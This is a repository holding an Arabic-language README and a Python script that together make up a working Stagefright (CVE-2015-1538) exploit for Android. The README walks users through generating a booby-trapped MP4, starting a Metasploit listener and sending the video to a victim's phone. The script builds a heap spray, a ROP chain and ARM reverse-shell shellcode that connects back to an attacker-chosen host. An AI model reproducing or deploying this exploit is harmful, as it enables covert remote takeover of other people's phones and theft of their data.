├── README.md
└── mp4.py


/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | Exploit-Android
 3 | اختراق هواتف الاندرويد عبر انشاء ملف MP4 ملغم 
 4 | اولا نقوم بدخول الى تطبيق TERMUX طبعاً ثم نقوم بتحميل اداة مخصص لتلغيم ملفات MP4 
 5 | تابع الاوامر 
 6 | apt update -y
 7 | 
 8 | apt upgrade -y
 9 | 
10 | pkg upgrade -y
11 | 
12 | pkg install git -y
13 | 
14 | 
15 | • git clone https://github.com/sadamshr3be/Exploit-Android
16 | 
17 | • cd Exploit-Android
18 | 
19 | ا لان دخلنا الى ملف اداة الان تابع اوامر التلغيم 
20 | 
21 | • python2 mp4.py -c 127.0.0.1 -p 4444
22 | 
23 | 
24 | طبعا  فقط تقوم بتعديل كلمة youip ادخال الاي بي ip الخاص بك خارجي او داخلي 
25 | وتعديل كلمة youport اكتب البورت الخاص بك ننصحك بادخال بورت4444 
26 | الان ندخل الى نظام ميتاسبلويت عبر كتابة
27 | • msfconsole 
28 | وبعدها تكتب الاوامر ...
29 | •  exploit/android/browser/stagefright_mp4_tx3g_64bit
30 | 
31 | • set lhost 127.0.0.1
32 | فقط قم بتغيير الاي بي ip الى اي بي خاص بك 👆
33 | • set lport 4444
34 | وبالاخر نكتب 
35 | • exploit
36 | وبعدها يمكنك ارسال الفيديو ملغم الى هاتف الضحية وعنده فتحه سيتم اختراقه...
37 | 
38 | طبعا تحتاج الى فتح بورت
39 | # قناتي علـّۓ. اليوتيوب 
40 | 
41 | https://youtube.com/channel/UCGmfv3D0tcKvHp8Tolf6Yqw
42 | 
43 | # قناتي على التلجرام 
44 | 
45 | https://t.me/termuxalsharabi
46 | # المدونه. 
47 | 
48 | https://termuxalsharabi.blogspot.com
49 | 
50 | # بقلم صدام الشرعبي
51 | 
52 | 
53 | 


--------------------------------------------------------------------------------
/mp4.py:
--------------------------------------------------------------------------------
  1 | #coding: utf-8
  2 | #!/usr/bin/env python
  3 | # Fixed By Rizaldi
  4 | # Joshua J. Drake (@jduck) of ZIMPERIUM zLabs
  5 | # Shout outs to our friends at Optiv (formerly Accuvant Labs)
  6 | # (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015
  7 | # www.zimperium.com
  8 | #
  9 | # Exploit for RCE Vulnerability CVE-2015-1538 #1
 10 | # Integer Overflow in the libstagefright MP4 'stsc' atom handling
 11 | #
 12 | # Don't forget, the output of ''create_mp4'' can be delivered many ways!
 13 | # MMS is the most dangerous attack vector, but not the only one…
 14 | #
 15 | # DISCLAIMER: This exploit is for testing and educational purposes only. Any
 16 | # other usage for this code is not allowed. Use at your own risk.
 17 | #
 18 | # ''With great power comes great responsibility.'' – Uncle Ben
 19 | #
 20 | import struct
 21 | import socket
 22 | #
 23 | # Creates a single MP4 atom – LEN, TAG, DATA
 24 | #
 25 | def make_chunk(tag, data):
 26 |    if len(tag) != 4:
 27 |        raise 'Yo! They call it “FourCC'' for a reason.'
 28 |    ret = struct.pack('>L', len(data) + 8)
 29 |    ret += tag
 30 |    ret += data
 31 |    return ret
 32 | #
 33 | # Make an 'stco' atom – Sample Table Chunk Offets
 34 | #
 35 | def make_stco(extra=''):
 36 |    ret =  struct.pack('>L', 0) # version
 37 |    ret += struct.pack('>L', 0) # mNumChunkOffsets
 38 |    return make_chunk('stco', ret+extra)
 39 | #
 40 | # Make an 'stsz' atom – Sample Table Size
 41 | #
 42 | def make_stsz(extra=''):
 43 |    ret =  struct.pack('>L', 0) # version
 44 |    ret += struct.pack('>L', 0) # mDefaultSampleSize
 45 |    ret += struct.pack('>L', 0) # mNumSampleSizes
 46 |    return make_chunk('stsz', ret+extra)
 47 | #
 48 | # Make an 'stts' atom – Sample Table Time-to-Sample
 49 | #
 50 | def make_stts():
 51 |    ret =  struct.pack('>L', 0) # version
 52 |    ret += struct.pack('>L', 0) # mTimeToSampleCount
 53 |    return make_chunk('stts', ret)
 54 | #
 55 | # This creates a single Sample Table Sample-to-Chunk entry
 56 | #
 57 | def make_stsc_entry(start, per, desc):
 58 |    ret = ''
 59 |    ret += struct.pack('>L', start + 1)
 60 |    ret += struct.pack('>L', per)
 61 |    ret += struct.pack('>L', desc)
 62 |    return ret
 63 | #
 64 | # Make an 'stsc' chunk – Sample Table Sample-to-Chunk
 65 | #
 66 | # If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and
 67 | # cause a heap overflow.
 68 | #
 69 | def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False):
 70 |    ret =  struct.pack('>L', 0) # version/flags
 71 |    # this is the clean version…
 72 |    if not do_overflow:
 73 |        ret += struct.pack('>L', num_alloc) # mNumSampleToChunkOffsets
 74 |        ret += 'Z' * (12 * num_alloc)
 75 |        return make_chunk('stsc', ret)
 76 | 
 77 |    # now the explicit version. (trigger the bug)
 78 |    ret += struct.pack('>L', 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets
 79 |    # fill in the entries that will overflow the buffer
 80 |    for x in range(0, num_write):
 81 |        ret += make_stsc_entry(sp_addr, sp_addr, sp_addr)
 82 | 
 83 |    ret = make_chunk('stsc', ret)
 84 | 
 85 |    # patch the data_size
 86 |    ret = struct.pack('>L', 8 + 8 + (num_alloc * 12)) + ret[4:]
 87 | 
 88 |    return ret
 89 | 
 90 | #
 91 | # Build the ROP chain
 92 | #
 93 | # ROP pivot by Georg Wicherski! Thanks!
 94 | #
 95 | """
 96 | (gdb) x/10i __dl_restore_core_regs
 97 |   0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34
 98 |   0xb0002854 <__dl_restore_core_regs+4>:   ldm r1, {r3, r4, r5}
 99 |   0xb0002858 <__dl_restore_core_regs+8>:   push    {r3, r4, r5}
100 |   0xb000285c <__dl_restore_core_regs+12>:  ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11}
101 |   0xb0002860 <__dl_restore_core_regs+16>:  ldm sp, {sp, lr, pc}
102 | """
103 | """
104 | b0001144 <__dl_mprotect>:
105 | b0001144:       e92d0090        push    {r4, r7}
106 | b0001148:       e3a0707d        mov     r7, #125        ; 0x7d
107 | b000114c:       ef000000        svc     0x00000000
108 | b0001150:       e8bd0090        pop     {r4, r7}
109 | b0001154:       e1b00000        movs    r0, r0
110 | b0001158:       512fff1e        bxpl    lr
111 | b000115c:       ea0015cc        b       b0006894 <__dl_raise+0x10>
112 | """
113 | def build_rop(off, sp_addr, newpc_val, cb_host, cb_port):
114 |    rop = ''
115 |    rop += struct.pack('<L', sp_addr + off + 0x10) # new sp
116 |    rop += struct.pack('<L', 0xb0002a98)           # new lr – pop {pc}
117 |    rop += struct.pack('<L', 0xb00038b2+1)         # new pc: pop {r0, r1, r2, r3, r4, pc}
118 | 
119 |    rop += struct.pack('<L', sp_addr & 0xfffff000) # new r0 – base address (page aligned)
120 |    rop += struct.pack('<L', 0x1000)               # new r1 – length
121 |    rop += struct.pack('<L', 7)                    # new r2 – protection
122 |    rop += struct.pack('<L', 0xd000d003)           # new r3 – scratch
123 |    rop += struct.pack('<L', 0xd000d004)           # new r4 – scratch
124 |    rop += struct.pack('<L', 0xb0001144)           # new pc – _dl_mprotect
125 | 
126 |    native_start = sp_addr + 0x80
127 |    rop += struct.pack('<L', native_start)         # address of native payload
128 |    #rop += struct.pack('<L', 0xfeedfed5)          # top of stack…
129 |    # linux/armle/shell_reverse_tcp (modified to pass env and fork/exit)
130 |    buf =  ''
131 |    # fork
132 |    buf += '\x02\x70\xa0\xe3'
133 |    buf += '\x00\x00\x00\xef'
134 |    # continue if not parent…
135 |    buf += '\x00\x00\x50\xe3'
136 |    buf += '\x02\x00\x00\x0a'
137 |    # exit parent
138 |    buf += '\x00\x00\xa0\xe3'
139 |    buf += '\x01\x70\xa0\xe3'
140 |    buf += '\x00\x00\x00\xef'
141 |    # setsid in child
142 |    buf += '\x42\x70\xa0\xe3'
143 |    buf += '\x00\x00\x00\xef'
144 |    # socket/connect/dup2/dup2/dup2
145 |    buf += '\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c'
146 |    buf += '\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60'
147 |    buf += '\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0'
148 |    buf += '\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1'
149 |    buf += '\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06'
150 |    buf += '\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00'
151 |    buf += '\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0'
152 |    buf += '\xe3\x00\x00\x00\xef'
153 |    # execve(shell, argv, env)
154 |    buf += '\x30\x00\x8f\xe2\x04\x40\x24\xe0'
155 |    buf += '\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d'
156 |    buf += '\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00'
157 |    buf += '\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00'
158 |    buf += '\xef\x02\x00'
159 |    # Add the connect back host/port
160 |    buf += struct.pack('!H', cb_port)
161 |    cb_host = socket.inet_aton(cb_host)
162 |    buf += struct.pack('=4s', cb_host)
163 |    # shell –
164 |    buf += '/system/bin/sh\x00\x00'
165 |    # argv –
166 |    buf += 'sh\x00\x00'
167 |    # env –
168 |    buf += 'PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00'
169 | 
170 |    # Add some identifiable stuff, just in case something goes awry…
171 |    rop_start_off = 0x34
172 |    x = rop_start_off + len(rop)
173 |    while len(rop) < 0x80 - rop_start_off:
174 |        rop += struct.pack('<L', 0xf0f00000+x)
175 |        x += 4
176 | 
177 |    # Add the native payload…
178 |    rop += buf
179 | 
180 |    return rop
181 | 
182 | #
183 | # Build an mp4 that exploits CVE-2015-1538 #1
184 | #
185 | # We mimic meow.3gp here…
186 | #
187 | def create_mp4(sp_addr, newpc_val, cb_host, cb_port):
188 |    chunks = []
189 | 
190 |    # Build the MP4 header…
191 |    ftyp =  'mp42'
192 |    ftyp += struct.pack('>L', 0)
193 |    ftyp += 'mp42'
194 |    ftyp += 'isom'
195 |    chunks.append(make_chunk('ftyp', ftyp))
196 | 
197 |    # Note, this causes a few allocations…
198 |    moov_data = ''
199 |    moov_data += make_chunk('mvhd',
200 |        struct.pack('>LL', 0, 0x41414141) +
201 |        ('B' * 0x5c) )
202 | 
203 |    # Add a minimal, verified trak to satisfy mLastTrack being set
204 |    moov_data += make_chunk('trak',
205 |        make_chunk('stbl',
206 |            make_stsc(0x28, 0x28) +
207 |            make_stco() +
208 |            make_stsz() +
209 |            make_stts() ))
210 | 
211 |    # Spray the heap using a large tx3g chunk (can contain binary data!)
212 |    """
213 |       0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>:   ldr r4, [r0, #4]  ; load mRefs
214 |       0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>:   mov r5, r0
215 |       0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>:   mov r6, r1
216 |       0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>:   mov r0, r4
217 |       0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>:  blx 0x40069884    ; atomic_decrement
218 |       0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>:  cmp r0, #1        ; must be 1
219 |       0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>:  bne.n   0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42>
220 |       0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>:  ldr r0, [r4, #8]  ; load refs->mBase
221 |       0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>:  ldr r1, [r0, #0]  ; load mBase._vptr
222 |       0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>:  ldr r2, [r1, #12] ; load method address
223 |       0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>:  mov r1, r6
224 |       0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>:  blx r2            ; call it!
225 |    """
226 |    page = ''
227 |    off = 0  # the offset to the next object
228 |    off += 8
229 |    page += struct.pack('<L', sp_addr + 8 + 16 + 8 + 12 - 28)    # _vptr.RefBase (for when we smash mDataSource)
230 |    page += struct.pack('<L', sp_addr + off) # mRefs
231 |    off += 16
232 |    page += struct.pack('<L', 1)             # mStrong
233 |    page += struct.pack('<L', 0xc0dedbad)    # mWeak
234 |    page += struct.pack('<L', sp_addr + off) # mBase
235 |    page += struct.pack('<L', 16)            # mFlags (dont set OBJECT_LIFETIME_MASK)
236 |    off += 8
237 |    page += struct.pack('<L', sp_addr + off) # the mBase _vptr.RefBase
238 |    page += struct.pack('<L', 0xf00dbabe)    # mBase.mRefs (unused)
239 |    off += 16
240 |    page += struct.pack('<L', 0xc0de0000 + 0x00)  # vtable entry 0
241 |    page += struct.pack('<L', 0xc0de0000 + 0x04)  # vtable entry 4
242 |    page += struct.pack('<L', 0xc0de0000 + 0x08)  # vtable entry 8
243 |    page += struct.pack('<L', newpc_val)          # vtable entry 12
244 |    rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port)
245 |    x = len(page)
246 |    while len(page) < 4096:
247 |        page += struct.pack('<L', 0xf0f00000+x)
248 |        x += 4
249 | 
250 |    off = 0x34
251 |    page = page[:off] + rop + page[off+len(rop):]
252 |    spray = page * (((2*1024*1024) / len(page)) - 20)
253 |    moov_data += make_chunk('tx3g', spray)
254 |    block = 'A' * 0x1c
255 |    bigger = 'B' * 0x40
256 |    udta = make_chunk('udta',
257 |        make_chunk('meta',
258 |            struct.pack('>L', 0) +
259 |            make_chunk('ilst',
260 |                make_chunk('cpil',    make_chunk('data', struct.pack('>LL', 21, 0) + 'A')) +
261 |                make_chunk('trkn',    make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABBBB')) +
262 |                make_chunk('disk',    make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABB')) +
263 |                make_chunk('covr',    make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
264 |                make_chunk('\xa9alb', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
265 |                make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
266 |                make_chunk('aART',    make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
267 |                make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
268 |                make_chunk('\xa9nam', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
269 |                make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
270 |                make_chunk('gnre',    make_chunk('data', struct.pack('>LL', 1, 0) + block)) +
271 |                make_chunk('covr',    make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
272 |                make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
273 |                make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
274 |                make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)))
275 |            )
276 |        )
277 |    moov_data += udta
278 | 
279 |    # Make the nasty trak
280 |    tkhd1 = ''.join([
281 |        '\x00',       # version
282 |        'D' * 3,      # padding
283 |        'E' * (5*4),  # {c,m}time, id, ??, duration
284 |        'F' * 0x10,   # ??
285 |        struct.pack('>LLLLLL',
286 |            0x10000,  # a00
287 |            0,        # a01
288 |            0,        # dx
289 |            0,        # a10
290 |            0x10000,  # a11
291 |            0),       # dy
292 |        'G' * 0x14
293 |        ])
294 | 
295 |    trak1 = ''
296 |    trak1 += make_chunk('tkhd', tkhd1)
297 | 
298 |    mdhd1 = ''.join([
299 |        '\x00',       # version
300 |        'D' * 0x17,   # padding
301 |        ])
302 | 
303 |    mdia1 = ''
304 |    mdia1 += make_chunk('mdhd', mdhd1)
305 |    mdia1 += make_chunk('hdlr', 'F' * 0x3a)
306 | 
307 |    dinf1 = ''
308 |    dinf1 += make_chunk('dref', 'H' * 0x14)
309 | 
310 |    minf1 = ''
311 |    minf1 += make_chunk('smhd', 'G' * 0x08)
312 |    minf1 += make_chunk('dinf', dinf1)
313 | 
314 |    # Build the nasty sample table to trigger the vulnerability here.
315 |    stbl1 = make_stsc(3, (0x1200 / 0xc) - 1, sp_addr, True) # TRIGGER
316 | 
317 |    # Add the stbl to the minf chunk
318 |    minf1 += make_chunk('stbl', stbl1)
319 | 
320 |    # Add the minf to the mdia chunk
321 |    mdia1 += make_chunk('minf', minf1)
322 | 
323 |    # Add the mdia to the track
324 |    trak1 += make_chunk('mdia', mdia1)
325 | 
326 |    # Add the nasty track to the moov data
327 |    moov_data += make_chunk('trak', trak1)
328 | 
329 |    # Finalize the moov chunk
330 |    moov = make_chunk('moov', moov_data)
331 |    chunks.append(moov)
332 | 
333 |    # Combine outer chunks together and voila.
334 |    data = ''.join(chunks)
335 | 
336 |    return data
337 | 
338 | if __name__ == '__main__':
339 |    import sys
340 |    import mp4
341 |    import argparse
342 | 
343 |    def write_file(path, content):
344 |        with open(path, 'wb') as f:
345 |            f.write(content)
346 | 
347 |    def addr(sval):
348 |        if sval.startswith('0x'):
349 |            return int(sval, 16)
350 |        return int(sval)
351 | 
352 |    # The address of a fake StrongPointer object (sprayed)
353 |    sp_addr   = 0x41d00010  # takju @ imm76i – 2MB (via hangouts)
354 | 
355 |    # The address to of our ROP pivot
356 |    newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs
357 | 
358 |    # Allow the user to override parameters
359 |    parser = argparse.ArgumentParser()
360 |    parser.add_argument('-c', '-connectback-host', dest='cbhost', default='31.3.3.7')
361 |    parser.add_argument('-p', '-connectback-port', dest='cbport', type=int, default=12345)
362 |    parser.add_argument('-s', '-spray-address', dest='spray_addr', type=addr, default=None)
363 |    parser.add_argument('-r', '-rop-pivot', dest='rop_pivot', type=addr, default=None)
364 |    parser.add_argument('-o', '-output-file', dest='output_file', default='fireworm.mp4')
365 |    args = parser.parse_args()
366 | 
367 |    if len(sys.argv) == 1:
368 |        parser.print_help()
369 |        sys.exit(-1)
370 | 
371 |    if args.spray_addr == None:
372 |        args.spray_addr = sp_addr
373 |    if args.rop_pivot == None:
374 |        args.rop_pivot = newpc_val
375 | 
376 |    # Build the MP4 file…
377 |    data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
378 |    print('[*] Saving crafted MP4 to %s …' % args.output_file)
379 |    write_file(args.output_file, data) 
380 | 


--------------------------------------------------------------------------------